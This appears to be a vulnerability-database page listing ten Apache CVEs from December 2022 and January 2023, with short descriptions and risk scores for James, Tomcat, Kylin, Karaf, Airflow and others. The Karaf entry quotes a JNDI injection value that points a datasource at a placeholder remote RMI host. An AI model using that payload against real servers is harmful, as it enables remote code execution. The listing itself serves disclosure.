Vulnerabilities > Apache
| DATE | CVE | VULNERABILITY TITLE | RISK |
|---|---|---|---|
| 2023-01-06 | CVE-2022-45787 | Cleartext Storage of Sensitive Information vulnerability in Apache James Unproper laxist permissions on the temporary files used by MIME4J TempFileStorageProvider may lead to information disclosure to other local users. | 5.5 |
| 2023-01-06 | CVE-2022-45935 | Unspecified vulnerability in Apache James Usage of temporary files with insecure permissions by the Apache James server allows an attacker with local access to access private user data in transit. | 5.5 |
| 2023-01-04 | CVE-2022-45875 | Unspecified vulnerability in Apache Dolphinscheduler Improper validation of script alert plugin parameters in Apache DolphinScheduler to avoid remote command execution vulnerability. | 9.8 |
| 2023-01-03 | CVE-2022-45143 | Unspecified vulnerability in Apache Tomcat The JsonErrorReportValve in Apache Tomcat 8.5.83, 9.0.40 to 9.0.68 and 10.1.0-M1 to 10.1.1 did not escape the type, message or description values. | 7.5 |
| 2023-01-03 | CVE-2021-32824 | Unspecified vulnerability in Apache Dubbo Apache Dubbo is a java based, open source RPC framework. | 9.8 |
| 2022-12-30 | CVE-2022-43396 | Unspecified vulnerability in Apache Kylin In the fix for CVE-2022-24697, a blacklist is used to filter user input commands. | 8.8 |
| 2022-12-30 | CVE-2022-44621 | Command Injection vulnerability in Apache Kylin Diagnosis Controller miss parameter validation, so user may attacked by command injection via HTTP Request. | 9.8 |
| 2022-12-22 | CVE-2022-45347 | Unspecified vulnerability in Apache Shardingsphere Apache ShardingSphere-Proxy prior to 5.3.0 when using MySQL as database backend didn't cleanup the database session completely after client authentication failed, which allowed an attacker to execute normal commands by constructing a special MySQL client. | 9.8 |
| 2022-12-21 | CVE-2022-40145 | Unspecified vulnerability in Apache Karaf This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8 | 9.8 |
| 2022-12-20 | CVE-2022-46421 | Command Injection vulnerability in Apache Apache-Airflow-Providers-Apache-Hive Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow Hive Provider.This issue affects Apache Airflow Hive Provider: before 5.0.0. | 9.8 |